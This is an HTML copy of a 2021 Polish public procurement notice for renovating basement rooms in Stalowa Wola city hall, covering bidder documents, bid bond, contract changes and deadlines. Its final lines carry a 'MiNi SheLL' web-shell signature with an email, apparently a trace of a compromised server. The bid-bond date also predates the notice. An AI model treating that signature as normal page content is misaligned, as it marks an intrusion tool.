tych należności; 5) odpisu lub informacji z Krajowego<br/>Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art.<br/>109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli<br/>odrębne przepisy wymagają wpisu do rejestru lub ewidencji;6) oświadczenia Wykonawcy o aktualności<br/>informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy, w zakresie podstaw<br/>wykluczenia z postępowania wskazanych przez zamawiającego, o których mowa w: a) art. 108 ust. 1<br/>pkt 3 ustawy, b) art. 108 ust. 1 pkt 4 ustawy, dotyczących orzeczenia zakazu ubiegania się o<br/>zamówienie publiczne tytułem środka zapobiegawczego, c) art. 108 ust. 1 pkt 5 ustawy, dotyczących<br/>zawarcia z innymi wykonawcami porozumienia mającego na celu zakłócenie konkurencji, d) art. 108<br/>ust. 1 pkt 6 ustawy, e) art. 109 ust. 1 pkt 1 ustawy, odnośnie do naruszenia obowiązków dotyczących<br/>płatności podatków i opłat lokalnych, o których mowa w ustawie z dnia 12 stycznia 1991 r. o podatkach<br/>i opłatach lokalnych (Dz. U. z 2019 r. poz. 1170), f) art. 109 ust. 1 pkt 5–10 ustawy.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">3. W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w<br/>postępowaniu dotyczącego zdolności do występowania w obrocie gospodarczym, Wykonawca na<br/>wezwanie zamawiającego przedkłada następujące dokumenty:<br/>1) Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br/>4. W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu dotyczącego<br/>uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z<br/>odrębnych przepisów, Wykonawca na wezwanie zamawiającego przedkłada następujące dokumenty:<br/>1) Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br/>5. W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu dotyczących<br/>sytuacji ekonomicznej lub finansowej, Wykonawca na wezwanie zamawiającego przedkłada<br/>następujące dokumenty:<br/>1) informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość<br/>posiadanych środków finansowych lub zdolność kredytową wykonawcy, w okresie nie wcześniejszym<br/>niż 3 miesiące przed jej złożeniem;<br/>6. W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu dotyczących<br/>zdolności technicznej lub zawodowej, Wykonawca na wezwanie zamawiającego przedkłada<br/>następujące dokumenty:<br/>1) wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i<br/>miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem<br/>dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o<br/>których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego<br/>roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w<br/>stanie uzyskać tych dokumentów – inne odpowiednie dokumenty – załącznik nr 5;<br/>2) wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w<br/>szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami<br/>budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i<br/>wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych<br/>przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami – załącznik nr 6;</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Na ofertę składają się następujące dokumenty i załączniki które pod rygorem nieważności,<br/>składa się w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym<br/>lub podpisem osobistym:<br/>1) formularz ofertowy;<br/>2) dowód wniesienia wadium;<br/>3) Kosztorys ofertowy sporządzony metodą uproszczoną – dokument nieobowiązkowy;<br/>2. Wraz z ofertą wykonawca winien przesłać wyłącznie w formie elektronicznej lub w postaci<br/>elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym:<br/>1) Pełnomocnictwo (jeżeli dotyczy).<br/>2) oświadczenie wykonawcy na podstawie art. 125 ust. 1 ustawy Pzp stanowiące wstępne<br/>potwierdzenie spełniania warunków udziału w postępowaniu oraz potwierdzenie braku podstaw<br/>do wykluczenia – składane odrębnie przez wykonawcę lub każdego z wykonawców konsorcjum<br/>- załącznik nr 2 i 3;<br/>3) oświadczenie na podstawie art. 125 ust. 1 ustawy Pzp stanowiące wstępne potwierdzenie<br/>spełniania warunków udziału w postępowaniu oraz potwierdzenie braku podstaw do wykluczenia<br/>– podpisane odrębnie przez podmiot udostępniający zasoby - załącznik nr 2 i 3;<br/>4) zobowiązanie innych podmiotów do oddania do dyspozycji wykonawcy zasobów na okres<br/>korzystania z nich przy wykonywaniu zamówienia (jeżeli dotyczy) - załącznik nr – podpisane<br/>odrębnie przez podmiot udostępniający zasoby - załącznik nr 9;<br/>5) Oświadczenie o którym mowa w art. 117 ust. 3 ustawy (dotyczy tylko wykonawców wspólnie<br/>ubiegających się o zamówienie) – podpisane wspólnie przez wykonawców - załącznik nr 4 <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Warunkiem udziału w postępowaniu jest wniesienie przez Wykonawcę wadium w wysokości 5<br/>000,00 zł (słownie: pięć tysięcy złotych) do dnia 9 czerwca 2021 r., do godziny 9:00 w formach<br/>określonych w art. 97 ust. 7 ustawy Pzp, tj.:<br/>1) pieniądzu;<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z<br/>dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z<br/>2019 r. poz. 310, 836 i 1572).<br/>2. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego:<br/>69 1020 4391 0000 6602 0196 0921 - Powszechna Kasa Oszczędności Bank Polski Spółka<br/>Akcyjna w Warszawie z dopiskiem „Wadium - Przebudowa, modernizacja i zmiana sposobu użytkowania części pomieszczeń piwnicznych w budynku Urzędu Miasta Stalowej Woli przy. Ul.<br/>Wolności 7 z szczególnym uwzględnieniem likwidacji zawilgoceń”.<br/>3. Wadium w innej formie niż pieniądz należy złożyć wraz z ofertą w oryginale w postaci<br/>elektronicznej. Gwarancja/poręczenie musi być podpisana przez przedstawiciela Gwaranta jeżeli<br/>wymagają tego przepisy. Wadium w formie poręczenia lub gwarancji musi obejmować cały<br/>okres związania ofertą, a beneficjentem takich dokumentów musi być Zamawiający –<br/>Stalowowolskie Centrum Usług Wspólnych Al. Jana Pawła II 25A, 37-450 Stalowa Wola.<br/>4. Z treści gwarancji /poręczenia winno wynikać bezwarunkowe i nieodwołalne zobowiązanie<br/>Gwaranta do wypłaty Zamawiającemu - Stalowowolskiemu Centrum Usług Wspólnych, na jego<br/>pierwsze żądanie, pełnej kwoty wadium we wszystkich okolicznościach określonych w art. 98<br/>ust. 6 Pzp.<br/>5. Dowód wniesienia wadium winien być załączony do oferty.<br/>6. Zamawiający dokonuje zwrotu wniesionego przez wykonawców wadium w trybach i na<br/>zasadach określonych w art. 98 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku gdyby wyłoniona w prowadzonym postępowaniu oferta została złożona przez<br/>dwóch lub więcej Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego<br/>Zamawiający zażąda umowy regulującej współpracę tych podmiotów przed przystąpieniem do<br/>podpisania umowy o zamówienie publiczne. 2.Zamawiający, w stosunku do Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia, w odniesieniu do warunku dotyczącego<br/>zdolności technicznej lub zawodowej - dopuszcza łączne spełnianie warunku przez<br/>Wykonawców. 3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do<br/>oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają<br/>poszczególni Wykonawcy <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający przewiduje możliwość zmiany umowy w przypadku:<br/>1) działania siły wyższej rozumianej jako zdarzenia zewnętrznego, niezależnego od działania<br/>stron umowy i których strony nie mogły przewidzieć i nie mogły mu przeciwdziałać, np. powódź,<br/>trąba powietrzna, huragan, itp. - w zakresie koniecznym, w szczególności terminu realizacji<br/>umowy;<br/>2) zmiany terminu realizacji przedmiotu zamówienia (skrócenia lub wydłużenia) lub zakresu<br/>realizacji wraz ze skutkami wprowadzenia takiej zmiany, przy czym zmiana spowodowana może<br/>być jedynie okolicznościami leżącymi wyłącznie po stronie Zamawiającego lub okolicznościami<br/>niezależnymi zarówno od Zamawiającego jak i od Wykonawcy tj. np.: konieczność przesunięcia<br/>terminu przekazania terenu robót, udzielenie zamówień dodatkowych, których wykonanie<br/>wpływa na zmianę terminu wykonania zamówienia podstawowego, zmiana dokumentacji<br/>projektowej (np. zmiana zakresu), okoliczności zaistniałe w trakcie realizacji przedmiotu umowy<br/>tj. np.: warunki archeologiczne, geologiczne, hydrogeologiczne, kolizje z sieciami infrastruktury,<br/>utrudniające lub uniemożliwiające terminowe wykonanie przedmiotu umowy, przedłużający się<br/>czas trwania procedur administracyjnych, wstrzymanie robót przez uprawniony organ, zmiany<br/>przepisów prawa istotnie wpływającego na zakres lub termin realizacji niniejszej umowy, odkrycia zabytku lub wprowadzenia istotnej dla przedsięwzięcia zmiany formy jego ochrony itp.<br/>3) zmiany zakresu przedmiotu umowy oraz sposobu wykonania przedmiotu umowy wraz ze<br/>skutkami wprowadzenia tej zmiany, przy czym zmiana spowodowana może być okolicznościami<br/>zaistniałymi w trakcie realizacji przedmiotu umowy, np. zmiana dokumentacji projektowej,<br/>zaistnienie warunków faktycznych na terenie robót, wpływających na zakres lub sposób<br/>wykonywania przedmiotu umowy tj. warunki geologiczne, hydrogeologiczne, kolizje z sieciami<br/>infrastruktury, konieczności zrealizowania przedmiotu Umowy przy zastosowaniu innych<br/>rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego prawa,<br/>ograniczeń wywołanych zmianami wprowadzanymi w oparciu o przepisy ustawy z dnia 5 grudnia<br/>2008 r. o zapobieganiu oraz zwalczaniu zakażeń i chorób zakaźnych u ludzi, w szczególności w<br/>związku z ustawą z dnia 2 marca 2020 r. o szczególnych rozwiązaniach związanych z<br/>zapobieganiem, przeciwdziałaniem i zwalczaniem COVID-19, innych chorób zakaźnych oraz<br/>wywołanych nimi sytuacji kryzysowych itp.,<br/>4) zmiany podmiotu trzeciego, na zasobach którego polega Wykonawca wykazując spełnianie<br/>warunków udziału w postępowaniu, z zastrzeżeniem, że nowy podmiot będzie spełniał warunki<br/>udziału w postępowaniu w tym zakresie,<br/>5) zmiany sposobu rozliczania przedmiotu umowy, w przypadku wystąpienia w trakcie realizacji<br/>zadania okoliczności, które nie były znane stronom umowy w chwili zawierania umowy.<br/>6) inne przewidziane w art. 455 ustawy Prawo zamówień publicznych.<br/>2. Strony przewidują możliwość zmiany (zmniejszenia lub zwiększenia) wysokości<br/>wynagrodzenia należnego Wykonawcy, o ile Wykonawca wykaże, że zmiana będzie wiązała się<br/>z dodatkowymi nakładami po jego stronie, w następujących przypadkach:<br/>1) zmiany przepisów prawa istotnie wpływającego na zakres lub termin realizacji niniejszej<br/>umowy;<br/>2) odkrycia zabytku lub wprowadzenia istotnej dla przedsięwzięcia zmiany formy jego ochrony;<br/>3) konieczności zrealizowania przedmiotu Umowy przy zastosowaniu innych rozwiązań<br/>technicznych lub materiałowych ze względu na zmiany obowiązującego prawa,<br/>4) wystąpienia Siły wyższej uniemożliwiającej wykonanie przedmiotu Umowy zgodnie z jej<br/>postanowieniami.<br/>3. W przypadkach określonych w ust. 1. i 2. Wykonawca jest zobowiązany do powiadomienia<br/>Zamawiającego w terminie 14 dni o zaistnieniu ww. sytuacji i jej wpływie na harmonogram i/lub<br/>koszt realizacji przedmiotu Umowy.<br/>4. Wszelkie zmiany, z zastrzeżeniem paragrafów niniejszej umowy, w których jest to wyraźnie<br/>zaznaczone, wymagają aneksu sporządzonego z zachowaniem formy pisemnej pod rygorem<br/>nieważności <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-07-12 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">SCUW Stalowa Wola miniportal oraz ePuap</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-07-12 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-08-10</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-06-25 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com